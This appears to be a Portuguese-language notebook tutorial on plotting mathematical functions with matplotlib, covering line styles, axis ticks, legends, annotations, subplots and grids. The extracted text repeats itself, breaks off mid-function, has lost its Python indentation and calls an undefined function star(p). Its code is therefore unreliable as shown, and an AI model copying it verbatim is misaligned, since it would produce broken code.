*Matplotlib* é a biblioteca Python mais conhecida para plotagem 2D (bidimensional) de *arrays*. Sua filosofia é simples: criar plotagens simples com apenas alguns comandos, ou apenas um. John Hunter [[History]](https://matplotlib.org/users/history.html), falecido em 2012, foi o autor desta biblioteca. Em 2008, ele escreveu que, enquanto buscava uma solução em Python para plotagem 2D, ele gostaria de ter, entre outras coisas:
- gráficos bonitos com pronta qualidade para publicação;
- capacidade de incorporação em interfaces gráficas para desenvolvimento de aplicações;
- um código fácil de entender e de manusear.
O *matplotlib* é um código dividido em três partes:
1. A interface *pylab*: um conjunto de funções predefinidas no submódulo `matplotlib.pyplot`.
2. O *frontend*: um conjunto de classes responsáveis pela criação de figuras, textos, linhas, gráficos etc. No *frontend*, todos os elementos gráficos são objetos ainda abstratos.
3. O *backend*: um conjunto de renderizadores responsáveis por converter os gráficos para dispositivos onde eles podem ser, de fato, visualizados. A [[renderização]](https://pt.wikipedia.org/wiki/Renderização) é o produto final do processamento digital. Por exemplo, o *backend* PS é responsável pela renderização de [[PostScript]](https://www.adobe.com/br/products/postscript.html). Já o *backend* SVG constroi gráficos vetoriais escaláveis ([[Scalable Vector Graphics]](https://www.w3.org/Graphics/SVG/).
Veja o conceito de [[Canvas]](https://en.wikipedia.org/wiki/Canvas_(GUI)).
### Sessões interativas do *matplotlib*
Sessões interativas do *matplotlib* são habilitadas através de um [[comando mágico]](https://ipython.readthedocs.io/en/stable/interactive/magics.html):
- Em consoles, use `%matplotlib`;
- No Jupyter notebook, use `%matplotlib inline`.
Lembre que na aula anterior usamos o comando mágico `%timeit` para temporizar operações.
Para usar plenamente o matplotlib nesta aula, vamos usar:
```python
%matplotlib inline
from matplotlib import pyplot as plt
```
A segunda instrução também pode ser feita como
```python
import matplotlib.pyplot as plt
```
em que `plt` é um *alias* já padronizado.
# chamada padrão
%matplotlib inline
import matplotlib.pyplot as plt
## Criação de plots simples
Vamos importar o *numpy* para usarmos os benefícios da computação vetorizada e plotar nossos primeiros exemplos.
import numpy as np
x = np.linspace(-10,10,50)
y = x
plt.plot(x,y); # reta y = x
**Exemplo:** plote o gráfico da parábola $f(x) = ax^2 + bx + c$ para valores quaisquer de $a,b,c$ no intervalo $-20 \leq x \leq 20$.
x = np.linspace(-20,20,50)
a,b,c = 2,3,4
y = a*x**2 + b*x + c # f(x)
plt.plot(x,y);
Podemos definir uma função para plotar a parábola:
def plota_parabola(a,b,c):
x = np.linspace(-20,21,50)
y = a*x**2 + b*x + c
plt.plot(x,y)
Agora podemos estudar o que cada coeficiente faz:
# mude o valor de a e considere b = 2, c = 1
for a in np.linspace(-2,3,10):
plota_parabola(a,2,1)
# mude o valor de b e considere a = 2, c = 1
for b in np.linspace(-2,3,20):
plota_parabola(2,b,1)
# mude o valor de c e considere a = 2, b = 1
for c in np.linspace(-2,3,10):
plota_parabola(2,1,c) # por que você não vê muitas mudanças?
# mude o valor de a, b e c
valores = np.linspace(-2,3,5)
for a in valores:
for b in valores:
for c in valores:
plota_parabola(a,b,c)
**Exemplo:** plote o gráfico da função $g(t) = a\cos(bt + \pi)$ para valores quaisquer de $a$ e $b$ no intervalo $0 \leq t \leq 2\pi$.
t = np.linspace(0,2*np.pi,50,endpoint=True) # t: ângulo
a, b = 1, 1
plt.plot(t,a*np.cos(b*t + np.pi));
b = 2
plt.plot(t,a*np.cos(b*t + np.pi));
b = 3
plt.plot(t,a*np.cos(b*t + np.pi));
As cores e marcações no gráfico são todas padronizadas. Vejamos como alterar tudo isto.
## Alteração de propriedades e estilos de linhas
Altere:
- cores com `color` ou `c`,
- espessura de linha com `linewidth` ou `lw`
- estilo de linha com `linestyle` ou `ls`
- tipo de símbolo marcador com `marker`
- largura de borda do símbolo marcardor com `markeredgewidth` ou `mew`
- cor de borda do símbolo marcardor com `markeredgecolor` ou `mec`
- cor de face do símbolo marcardor com `markerfacecolor` ou `mfc`
- transparência com `alpha` no intervalo [0,1]
g = lambda a,b: a*np.cos(b*t + np.pi) # assume t anterior
# estude cada exemplo
# a ordem do 3o. argumento em diante pode mudar
plt.plot(t,g(1,1),color='c',linewidth=5,linestyle='-.',alpha=.3)
plt.plot(t,g(1,2),c='g',ls='-',lw='.7',marker='s',mfc='y',ms=8)
plt.plot(t,g(1,3),c='#e26d5a',ls=':', marker='d',mec='k',mew=2.0);
Cores e estilo de linha podem ser especificados de modo reduzido e em ordens distintas usando um especificador de formato.
plt.plot(t,g(1,1),'yv') # amarelo; triângulo para baixo;
plt.plot(t,g(1,2),':c+') # pontilhado; ciano; cruz;
plt.plot(t,-g(2,2),'>-.r'); # triangulo direita; traço-ponto; vermelho;
### Plotagem múltipla
O exemplo acima poderia ser feito como plotagem múltipla em 3 blocos do tipo (`x,y,'fmt')`, onde `x` e `y` são as informações dos eixos coordenados e `fmt` é uma string de formatação.
plt.plot(t,g(1,1),'yv', t,g(1,2),':c+', t,-g(2,2),'>-.r'); # 3 blocos sequenciados
Para verificar todas as opções de propriedades e estilos de linhas, veja `plt.plot?`.
### Especificação de figuras
Use `plt.figure` para criar um ambiente de figura e altere:
- a largura e altura (em polegadas) com `figsize = (largura,altura)`. O padrão é (6.4,4.8).
- a resolução (em pontos por polegadas) com `dpi`. O padrão é 100.
- a cor de fundo (*background*) com `facecolor`. O padrão é `w` (branco).
**Exemplo:** Plote os gráficos de $h_1(x) = a\sqrt{x}$ e $h_2(x) = be^{\frac{x}{c}}$ para valores de a,b,c e propriedades acima livres.
x = np.linspace(0,10,50,endpoint=True)
h1, h2 = lambda a: a*np.sqrt(x), lambda b,c: b*np.exp(x/c)
plt.figure(figsize=(8,6), dpi=200, facecolor='#e0eeee')
plt.plot(x,h1(.9),x,h2(1,9));
### Alterando limites e marcações de eixos
Altere:
- o intervalo do eixo `x` com `xlim`
- o intervalo do eixo `y` com `ylim`
- as marcações do eixo `x` com `xticks`
- as marcações do eixo `y` com `yticks`
plt.plot(x,h1(.9),x,h2(1,9)); plt.xlim(1.6,9.2); plt.ylim(1.0,2.8);
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi]); # lista de múltiplos de pi
plt.yticks([-1, 0, 1]); # 3 valores em y
### Especificando texto de marcações em eixos
Podemos alterar as marcações das `ticks` passando um texto indicativo. No caso anterior, seria melhor algo como:
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
# o par de $...$ formata os números na linguagem TeX
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi], ['$0$','$\pi/2$','$\pi$','$3/2\pi$','$2\pi$']);
plt.yticks([-1, 0, 1], ['$y = -1$', '$y = 0$', '$y = +1$']);
### Deslocamento de eixos principais
Os eixos principais podem ser movidos para outras posições arbitrárias e as bordas da área de plotagem desligadas usando `spine`.
# plotagem da função
x = np.linspace(-3,3)
plt.plot(x,x**1/2*np.sin(x)-0.5); # f(x) = √x*sen(x) - 1/2
ax = plt.gca()
ax.spines['right'].set_color('none') # remove borda direita
ax.spines['top'].set_color('none') # remove borda superior
ax.spines['bottom'].set_position(('data',0)) # desloca eixo para x = 0
ax.spines['left'].set_position(('data',0)) # desloca eixo para y = 0
ax.xaxis.set_ticks_position('top') # desloca marcações para cima
ax.yaxis.set_ticks_position('right') # desloca marcações para a direita
plt.xticks([-2,0,2]) # altera ticks de x
ax.set_xticklabels(['esq.','zero','dir.']) # altera ticklabels de x
plt.yticks([-0.4,0,0.4]) # altera ticks de y
ax.set_yticklabels(['sup.','zero','inf.']); # altera ticklabels de y
### Inserção de legendas
Para criarmos:
- uma legenda para os gráficos, usamos `legend`.
- uma legenda para o eixo x, usamos `xlabel`
- uma legenda para o eixo y, usamos `ylabel`
- um título para o gráfico, usamos `title`
**Exemplo:** plote o gráfico da reta $f_1(x) = x + 1$ e da reta $f_2(x) = 1 - x$ e adicione uma legenda com cores azul e laranja.
plt.plot(x, x + 1,'-b', label = 'y = x + 1' )
plt.plot(x, 1-x, c = [1.0,0.5,0.0], label = 'y = 1 - x'); # laranja: 100% de vermelho, 50% verde
plt.legend(loc = 'best') # 'loc=best' : melhor localização da legenda
plt.xlabel('x'); plt.ylabel('y'); plt.title('Gráfico de duas retas');
#### Localização de legendas
Use `loc=valor` para especificar onde posicionar a legenda. Use `plt.legend?` para verificar as posições disponíveis para `valor`. Vide tabela de valores `Location String` e `Location Code`.
plt.plot(np.nan,np.nan,label='upper right'); # nan : not a number
plt.legend(loc=1); # usando número
plt.plot(np.nan,np.nan,label='loc=1');
plt.legend(loc='upper right'); # usando a string correspondente
### Alteração de tamanho de fonte
Para alterar o tamanho da fonte de legendas, use `fontsize`.
plt.plot(np.nan,np.nan,label='legenda');
FSx, FSy, FSleg, FStit = 10, 20, 30, 40
plt.xlabel('Eixo x',c='b', fontsize=FSx)
plt.ylabel('Eixo y',c='g', fontsize=FSy)
plt.legend(loc='center', fontsize=FSleg);
plt.title('Título', c='c', fontsize=FStit);
### Anotações simples
Podemos incluir anotações em gráficos com a função `annotate(texto,xref,yref)`
plt.plot(np.nan,np.nan);
plt.annotate('P (0.5,0.5)',(0.5,0.5));
plt.annotate('Q (0.1,0.8)',(0.1,0.8));
**Exemplo**: gere um conjunto de 10 pontos $(x,y)$ aleatórios em que $0.2 < x,y < 0.8$ e anote-os no plano.
# gera uma lista de 10 pontos satisfazendo a condição
P = []
while len(P) != 10:
xy = np.round(np.random.rand(2),1)
test = np.all( (xy > 0.2) & (xy < 0.8) )
if test:
P.append(tuple(xy))
# plota o plano
plt.figure(figsize=(8,8))
plt.xlim(0,1)
plt.ylim(0,1)
for ponto in P:
plt.plot(ponto[0],ponto[1],'o')
plt.annotate(f'({ponto[0]},{ponto[1]})',ponto,fontsize=14)
**Problema:** o código acima tem um problema. Verifique que `len(P) = 10`, mas ele não plota os 10 pontos como gostaríamos de ver. Descubra o que está acontecendo e proponha uma solução.
## Multiplotagem e eixos
No matplotlib, podemos trabalhar com a função `subplot(m,n,p)` para criar múltiplas figuras e eixos independentes como se cada figura fosse um elemento de uma grande "matriz de figuras" de `m` linhas e `n` colunas, enquanto `p` é o índice da figura (este valor será no máximo o produto `mxn`). A função funciona da seguinte forma.
- Exemplo 1: suponha que você queira criar 3 figuras e dispô-las em uma única linha. Neste caso, `m = 1`, `n = 3` e `p` variará de 1 a 3, visto que `mxn = 3`.
- Exemplo 2: suponha que você queira criar 6 figuras e dispô-las em 2 linhas e 3 colunas. Neste caso, `m = 2`, `n = 3` e `p` variará de 1 a 6, visto que `mxn = 6`.
- Exemplo 3: suponha que você queira criar 12 figuras e dispô-las em 4 linhas e 3 colunas. Neste caso, `m = 4`, `n = 3` e `p` variará de 1 a 12, visto que `mxn = 12`.
Cada plotagem possui seu eixo independentemente da outra.
**Exemplo 1:** gráfico de 1 reta, 1 parábola e 1 polinômio cúbico lado a lado.
x = np.linspace(-5,5,20)
plt.figure(figsize=(15,4))
# aqui p = 1
plt.subplot(1,3,1) # plt.subplot(131) também é válida
plt.plot(x,2*x-1,c='r',marker='^')
plt.title('$y=2x-1$')
# aqui p = 2
plt.subplot(1,3,2) # plt.subplot(132) também é válida
plt.plot(x,3*x**2 - 2*x - 1,c='g',marker='o')
plt.title('$y=3x^2 - 2x - 1$')
# aqui p = 3
plt.subplot(1,3,3) # plt.subplot(133) também é válida
plt.plot(x,1/2*x**3 + 3*x**2 - 2*x - 1,c='b',marker='*')
plt.title('$y=1/2x^3 + 3x^2 - 2x - 1$');
**Exemplo 2:** gráficos de {$sen(x)$, $sen(2x)$, $sen(3x)$} e {$cos(x)$, $cos(2x)$, $cos(3x)$} dispostos em matriz 2x3.
plt.figure(figsize=(15,4))
plt.subplots_adjust(top=2.5,right=1.2) # ajusta a separação dos plots individuais
def sencosx(p):
x = np.linspace(0,2*np.pi,50)
plt.subplot(2,3,p)
if p <= 3:
plt.plot(x,np.sin(p*x),c=[p/4,p/5,p/6],label=f'$sen({p}x)$')
plt.title(f'subplot(2,3,{p})');
else:
plt.title(f'subplot(2,3,{p})');
p-=3 #
plt.plot(x,np.cos(p*x),c=[p/9,p/7,p/8],label=f'$cos({p}x)$')
plt.legend(loc=0,fontsize=8)
plt.xlabel('x'); plt.ylabel('y');
# plotagem
for p in range(1,7):
sencosx(p)
**Exemplo 3:** gráficos de um ponto isolado em matriz 4 x 3.
plt.figure(figsize=(15,4))
m,n = 4,3
for p in range(1,m*n+1):
star(p);
## Plots com gradeado
Podemos habilitar o gradeado usando `grid(b,which,axis)`.
Para especificar o gradeado:
- em ambos os eixos, use `b='True'` ou `b='False'`.
- maior, menor ou ambos, use `which='major'`, `which='minor'` ou `which='both'`.
- nos eixos x, y ou ambos, use `axis='x'`, `axis='y'` ou `axis='both'`.
x = np.linspace(-10,10)
plt.plot(x,x)
plt.grid(True)
plt.plot(x,x)
plt.grid(True,which='major',axis='x')
plt.plot(x,x)
plt.grid(True,which='major',axis='y')
**Exemplo:** plotagem de gradeado.
Neste exemplo, um eixo abstrato é adicionado sobre a figura (criada diretamente) origem no ponto (0.025,0.025), largura 0.95 e altura 0.95.
ax = plt.axes([0.025, 0.025, 0.95, 0.95])
ax.set_xlim(0,4)
ax.set_ylim(0,3)
# MultipleLocator estabelece pontos de referência para divisão da grade
ax.xaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em X
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.2)) # divisor maior em X
ax.yaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em Y
ax.yaxis.set_minor_locator(plt.MultipleLocator(0.1)) # divisor maior em Y
# propriedades das linhas
ax.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='x', linewidth=0.5, linestyle=':', color='b')
ax.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='y', linewidth=0.5, linestyle=':', color='g')
# para remover as ticks, adicione comentários
#ax.set_xticklabels([])
#ax.set_yticklabels([]);
plt.plot(x,x,'k')
plt.plot(x,-x+4,'k')
## Plots com preenchimento
Podemos usar `fill_between` para criar preenchimentos de área em gráficos.
x = np.linspace(-np.pi, np.pi, 60)
y = np.sin(2*x)*np.cos(x/2)
plt.fill_between(x,y,alpha=0.5);
x = np.linspace(-np.pi, np.pi, 60)
f1 = np.sin(2*x)
f2 = 0.5*np.sin(2*x)
plt.plot(x,f1,c='r');
plt.plot(x,f2,c='k');
plt.fill_between(x,f1,f2,color='g',alpha=0.2); | 41.372146 | 825 | 0.698306 | # Plotagem básica com _matplotlib_
## Visualização de dados
A visualização de dados é um campo do conhecimento bastante antigo que foi trazido à mostra muito recentemente com a expansão do "Big Data". Seu principal objetivo é representar dados e informações graficamente por meio de elementos visuais como tabelas, gráficos, mapas e infográficos. Diversas ferramentas estão disponíveis para tornar a interpretação de dados mais clara, compreensível e acessível.
No contexto da análise de dados, a visualização de dados é um componente fundamental para a criação de relatórios de negócios, painéis de instrumentos (_dashboards_) e gráficos multidimensionais que são aplicáveis às mais diversas disciplinas, tais como Economia, Ciência Política e, principalmente, todo o núcleo de ciências exatas (Matemática, Estatística e Computação).
Em seu livro _The Visual Display of Quantitative Information_, [[Edward Tufte]](https://www.edwardtufte.com/tufte/), conhecido como o guru do _design_ aplicado à visualização de dados, afirma que, a cada ano, o mundo produz algo entre 900 bilhões e 2 trilhões de imagens impressas de gráficos. Ele destaca que o _design_ de um gráfico estatístico, por exemplo, é uma matéria universal similar à Matemática e não está atrelado a características únicas de uma linguagem particular. Portanto, aprender visualização de dados para comunicar dados com eficiência é tão importante quanto aprender a Língua Portuguesa para escrever melhor.
Você pode ver uma lista sugestiva de bons blogues e livros sobre visualização de dados nas páginas de aprendizagem do software Tableau [[TabelauBlogs]](https://www.tableau.com/learn/articles/best-data-visualization-blogs), [[TabelauBooks]](https://www.tableau.com/learn/articles/books-about-data-visualization).
## _Data storytelling_
_Data Storytelling_ é o processo de "contar histórias através dos dados". [[Cole Knaflic]](http://www.storytellingwithdata.com), uma engenheira de dados do Google, ao perceber como a quantidade de informação produzida no mundo às vezes é muito mal lida e comunicada, escreveu dois *best-sellers* sobre este tema a fim de ajudar pessoas a comunicarem melhor seus dados e produtos quantitativos. Ela argumenta em seu livro *Storytelling with Data: A Data Visualization Guide for Business Professionals* (*Storytelling com Dados: um Guia Sobre Visualização de Dados Para Profissionais de Negócios*, na versão em português) que não somos inerentemente bons para "contar uma história" através dos dados. Cole mostra com poucas lições o que devemos aprender para atingir uma comunicação eficiente por meio da visualização de dados.
## Plotagem matemática
_Plotagem_ é o termo comumente empregado para o esboço de gráficos de funções matemáticas via computador. Plotar gráficos é uma das tarefas que você mais realizará como futuro(a) cientista ou analista de dados. Nesta aula, nós introduziremos você ao universo da plotagem de gráficos em duas dimensões e ensinar como você pode visualizar dados facilmente com a biblioteca *matplotlib*. Daremos uma visão geral principalmente sobre a plotagem de funções matemáticas utilizando *arrays* e recursos de computação vetorizada com *numpy* já aprendidos. Ao longo do curso, você aprenderá a fazer plotagens mais interessantes de cunho estatístico.
## A biblioteca *matplotlib*
*Matplotlib* é a biblioteca Python mais conhecida para plotagem 2D (bidimensional) de *arrays*. Sua filosofia é simples: criar plotagens simples com apenas alguns comandos, ou apenas um. John Hunter [[History]](https://matplotlib.org/users/history.html), falecido em 2012, foi o autor desta biblioteca. Em 2008, ele escreveu que, enquanto buscava uma solução em Python para plotagem 2D, ele gostaria de ter, entre outras coisas:
- gráficos bonitos com pronta qualidade para publicação;
- capacidade de incorporação em interfaces gráficas para desenvolvimento de aplicações;
- um código fácil de entender e de manusear.
O *matplotlib* é um código dividido em três partes:
1. A interface *pylab*: um conjunto de funções predefinidas no submódulo `matplotlib.pyplot`.
2. O *frontend*: um conjunto de classes responsáveis pela criação de figuras, textos, linhas, gráficos etc. No *frontend*, todos os elementos gráficos são objetos ainda abstratos.
3. O *backend*: um conjunto de renderizadores responsáveis por converter os gráficos para dispositivos onde eles podem ser, de fato, visualizados. A [[renderização]](https://pt.wikipedia.org/wiki/Renderização) é o produto final do processamento digital. Por exemplo, o *backend* PS é responsável pela renderização de [[PostScript]](https://www.adobe.com/br/products/postscript.html). Já o *backend* SVG constroi gráficos vetoriais escaláveis ([[Scalable Vector Graphics]](https://www.w3.org/Graphics/SVG/).
Veja o conceito de [[Canvas]](https://en.wikipedia.org/wiki/Canvas_(GUI)).
### Sessões interativas do *matplotlib*
Sessões interativas do *matplotlib* são habilitadas através de um [[comando mágico]](https://ipython.readthedocs.io/en/stable/interactive/magics.html):
- Em consoles, use `%matplotlib`;
- No Jupyter notebook, use `%matplotlib inline`.
Lembre que na aula anterior usamos o comando mágico `%timeit` para temporizar operações.
Para usar plenamente o matplotlib nesta aula, vamos usar:
```python
%matplotlib inline
from matplotlib import pyplot as plt
```
A segunda instrução também pode ser feita como
```python
import matplotlib.pyplot as plt
```
em que `plt` é um *alias* já padronizado.
# chamada padrão
%matplotlib inline
import matplotlib.pyplot as plt
## Criação de plots simples
Vamos importar o *numpy* para usarmos os benefícios da computação vetorizada e plotar nossos primeiros exemplos.
import numpy as np
x = np.linspace(-10,10,50)
y = x
plt.plot(x,y); # reta y = x
**Exemplo:** plote o gráfico da parábola $f(x) = ax^2 + bx + c$ para valores quaisquer de $a,b,c$ no intervalo $-20 \leq x \leq 20$.
x = np.linspace(-20,20,50)
a,b,c = 2,3,4
y = a*x**2 + b*x + c # f(x)
plt.plot(x,y);
Podemos definir uma função para plotar a parábola:
def plota_parabola(a,b,c):
x = np.linspace(-20,21,50)
y = a*x**2 + b*x + c
plt.plot(x,y)
Agora podemos estudar o que cada coeficiente faz:
# mude o valor de a e considere b = 2, c = 1
for a in np.linspace(-2,3,10):
plota_parabola(a,2,1)
# mude o valor de b e considere a = 2, c = 1
for b in np.linspace(-2,3,20):
plota_parabola(2,b,1)
# mude o valor de c e considere a = 2, b = 1
for c in np.linspace(-2,3,10):
plota_parabola(2,1,c) # por que você não vê muitas mudanças?
# mude o valor de a, b e c
valores = np.linspace(-2,3,5)
for a in valores:
for b in valores:
for c in valores:
plota_parabola(a,b,c)
**Exemplo:** plote o gráfico da função $g(t) = a\cos(bt + \pi)$ para valores quaisquer de $a$ e $b$ no intervalo $0 \leq t \leq 2\pi$.
t = np.linspace(0,2*np.pi,50,endpoint=True) # t: ângulo
a, b = 1, 1
plt.plot(t,a*np.cos(b*t + np.pi));
b = 2
plt.plot(t,a*np.cos(b*t + np.pi));
b = 3
plt.plot(t,a*np.cos(b*t + np.pi));
As cores e marcações no gráfico são todas padronizadas. Vejamos como alterar tudo isto.
## Alteração de propriedades e estilos de linhas
Altere:
- cores com `color` ou `c`,
- espessura de linha com `linewidth` ou `lw`
- estilo de linha com `linestyle` ou `ls`
- tipo de símbolo marcador com `marker`
- largura de borda do símbolo marcardor com `markeredgewidth` ou `mew`
- cor de borda do símbolo marcardor com `markeredgecolor` ou `mec`
- cor de face do símbolo marcardor com `markerfacecolor` ou `mfc`
- transparência com `alpha` no intervalo [0,1]
g = lambda a,b: a*np.cos(b*t + np.pi) # assume t anterior
# estude cada exemplo
# a ordem do 3o. argumento em diante pode mudar
plt.plot(t,g(1,1),color='c',linewidth=5,linestyle='-.',alpha=.3)
plt.plot(t,g(1,2),c='g',ls='-',lw='.7',marker='s',mfc='y',ms=8)
plt.plot(t,g(1,3),c='#e26d5a',ls=':', marker='d',mec='k',mew=2.0);
Cores e estilo de linha podem ser especificados de modo reduzido e em ordens distintas usando um especificador de formato.
plt.plot(t,g(1,1),'yv') # amarelo; triângulo para baixo;
plt.plot(t,g(1,2),':c+') # pontilhado; ciano; cruz;
plt.plot(t,-g(2,2),'>-.r'); # triangulo direita; traço-ponto; vermelho;
### Plotagem múltipla
O exemplo acima poderia ser feito como plotagem múltipla em 3 blocos do tipo (`x,y,'fmt')`, onde `x` e `y` são as informações dos eixos coordenados e `fmt` é uma string de formatação.
plt.plot(t,g(1,1),'yv', t,g(1,2),':c+', t,-g(2,2),'>-.r'); # 3 blocos sequenciados
Para verificar todas as opções de propriedades e estilos de linhas, veja `plt.plot?`.
### Especificação de figuras
Use `plt.figure` para criar um ambiente de figura e altere:
- a largura e altura (em polegadas) com `figsize = (largura,altura)`. O padrão é (6.4,4.8).
- a resolução (em pontos por polegadas) com `dpi`. O padrão é 100.
- a cor de fundo (*background*) com `facecolor`. O padrão é `w` (branco).
**Exemplo:** Plote os gráficos de $h_1(x) = a\sqrt{x}$ e $h_2(x) = be^{\frac{x}{c}}$ para valores de a,b,c e propriedades acima livres.
x = np.linspace(0,10,50,endpoint=True)
h1, h2 = lambda a: a*np.sqrt(x), lambda b,c: b*np.exp(x/c)
plt.figure(figsize=(8,6), dpi=200, facecolor='#e0eeee')
plt.plot(x,h1(.9),x,h2(1,9));
### Alterando limites e marcações de eixos
Altere:
- o intervalo do eixo `x` com `xlim`
- o intervalo do eixo `y` com `ylim`
- as marcações do eixo `x` com `xticks`
- as marcações do eixo `y` com `yticks`
plt.plot(x,h1(.9),x,h2(1,9)); plt.xlim(1.6,9.2); plt.ylim(1.0,2.8);
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi]); # lista de múltiplos de pi
plt.yticks([-1, 0, 1]); # 3 valores em y
### Especificando texto de marcações em eixos
Podemos alterar as marcações das `ticks` passando um texto indicativo. No caso anterior, seria melhor algo como:
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
# o par de $...$ formata os números na linguagem TeX
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi], ['$0$','$\pi/2$','$\pi$','$3/2\pi$','$2\pi$']);
plt.yticks([-1, 0, 1], ['$y = -1$', '$y = 0$', '$y = +1$']);
### Deslocamento de eixos principais
Os eixos principais podem ser movidos para outras posições arbitrárias e as bordas da área de plotagem desligadas usando `spine`.
# plotagem da função
x = np.linspace(-3,3)
plt.plot(x,x**1/2*np.sin(x)-0.5); # f(x) = √x*sen(x) - 1/2
ax = plt.gca()
ax.spines['right'].set_color('none') # remove borda direita
ax.spines['top'].set_color('none') # remove borda superior
ax.spines['bottom'].set_position(('data',0)) # desloca eixo para x = 0
ax.spines['left'].set_position(('data',0)) # desloca eixo para y = 0
ax.xaxis.set_ticks_position('top') # desloca marcações para cima
ax.yaxis.set_ticks_position('right') # desloca marcações para a direita
plt.xticks([-2,0,2]) # altera ticks de x
ax.set_xticklabels(['esq.','zero','dir.']) # altera ticklabels de x
plt.yticks([-0.4,0,0.4]) # altera ticks de y
ax.set_yticklabels(['sup.','zero','inf.']); # altera ticklabels de y
### Inserção de legendas
Para criarmos:
- uma legenda para os gráficos, usamos `legend`.
- uma legenda para o eixo x, usamos `xlabel`
- uma legenda para o eixo y, usamos `ylabel`
- um título para o gráfico, usamos `title`
**Exemplo:** plote o gráfico da reta $f_1(x) = x + 1$ e da reta $f_2(x) = 1 - x$ e adicione uma legenda com cores azul e laranja.
plt.plot(x, x + 1,'-b', label = 'y = x + 1' )
plt.plot(x, 1-x, c = [1.0,0.5,0.0], label = 'y = 1 - x'); # laranja: 100% de vermelho, 50% verde
plt.legend(loc = 'best') # 'loc=best' : melhor localização da legenda
plt.xlabel('x'); plt.ylabel('y'); plt.title('Gráfico de duas retas');
#### Localização de legendas
Use `loc=valor` para especificar onde posicionar a legenda. Use `plt.legend?` para verificar as posições disponíveis para `valor`. Vide tabela de valores `Location String` e `Location Code`.
plt.plot(np.nan,np.nan,label='upper right'); # nan : not a number
plt.legend(loc=1); # usando número
plt.plot(np.nan,np.nan,label='loc=1');
plt.legend(loc='upper right'); # usando a string correspondente
### Alteração de tamanho de fonte
Para alterar o tamanho da fonte de legendas, use `fontsize`.
plt.plot(np.nan,np.nan,label='legenda');
FSx, FSy, FSleg, FStit = 10, 20, 30, 40
plt.xlabel('Eixo x',c='b', fontsize=FSx)
plt.ylabel('Eixo y',c='g', fontsize=FSy)
plt.legend(loc='center', fontsize=FSleg);
plt.title('Título', c='c', fontsize=FStit);
### Anotações simples
Podemos incluir anotações em gráficos com a função `annotate(texto,xref,yref)`
plt.plot(np.nan,np.nan);
plt.annotate('P (0.5,0.5)',(0.5,0.5));
plt.annotate('Q (0.1,0.8)',(0.1,0.8));
**Exemplo**: gere um conjunto de 10 pontos $(x,y)$ aleatórios em que $0.2 < x,y < 0.8$ e anote-os no plano.
# gera uma lista de 10 pontos satisfazendo a condição
P = []
while len(P) != 10:
xy = np.round(np.random.rand(2),1)
test = np.all( (xy > 0.2) & (xy < 0.8) )
if test:
P.append(tuple(xy))
# plota o plano
plt.figure(figsize=(8,8))
plt.xlim(0,1)
plt.ylim(0,1)
for ponto in P:
plt.plot(ponto[0],ponto[1],'o')
plt.annotate(f'({ponto[0]},{ponto[1]})',ponto,fontsize=14)
**Problema:** o código acima tem um problema. Verifique que `len(P) = 10`, mas ele não plota os 10 pontos como gostaríamos de ver. Descubra o que está acontecendo e proponha uma solução.
## Multiplotagem e eixos
No matplotlib, podemos trabalhar com a função `subplot(m,n,p)` para criar múltiplas figuras e eixos independentes como se cada figura fosse um elemento de uma grande "matriz de figuras" de `m` linhas e `n` colunas, enquanto `p` é o índice da figura (este valor será no máximo o produto `mxn`). A função funciona da seguinte forma.
- Exemplo 1: suponha que você queira criar 3 figuras e dispô-las em uma única linha. Neste caso, `m = 1`, `n = 3` e `p` variará de 1 a 3, visto que `mxn = 3`.
- Exemplo 2: suponha que você queira criar 6 figuras e dispô-las em 2 linhas e 3 colunas. Neste caso, `m = 2`, `n = 3` e `p` variará de 1 a 6, visto que `mxn = 6`.
- Exemplo 3: suponha que você queira criar 12 figuras e dispô-las em 4 linhas e 3 colunas. Neste caso, `m = 4`, `n = 3` e `p` variará de 1 a 12, visto que `mxn = 12`.
Cada plotagem possui seu eixo independentemente da outra.
**Exemplo 1:** gráfico de 1 reta, 1 parábola e 1 polinômio cúbico lado a lado.
x = np.linspace(-5,5,20)
plt.figure(figsize=(15,4))
# aqui p = 1
plt.subplot(1,3,1) # plt.subplot(131) também é válida
plt.plot(x,2*x-1,c='r',marker='^')
plt.title('$y=2x-1$')
# aqui p = 2
plt.subplot(1,3,2) # plt.subplot(132) também é válida
plt.plot(x,3*x**2 - 2*x - 1,c='g',marker='o')
plt.title('$y=3x^2 - 2x - 1$')
# aqui p = 3
plt.subplot(1,3,3) # plt.subplot(133) também é válida
plt.plot(x,1/2*x**3 + 3*x**2 - 2*x - 1,c='b',marker='*')
plt.title('$y=1/2x^3 + 3x^2 - 2x - 1$');
**Exemplo 2:** gráficos de {$sen(x)$, $sen(2x)$, $sen(3x)$} e {$cos(x)$, $cos(2x)$, $cos(3x)$} dispostos em matriz 2x3.
plt.figure(figsize=(15,4))
plt.subplots_adjust(top=2.5,right=1.2) # ajusta a separação dos plots individuais
def sencosx(p):
x = np.linspace(0,2*np.pi,50)
plt.subplot(2,3,p)
if p <= 3:
plt.plot(x,np.sin(p*x),c=[p/4,p/5,p/6],label=f'$sen({p}x)$')
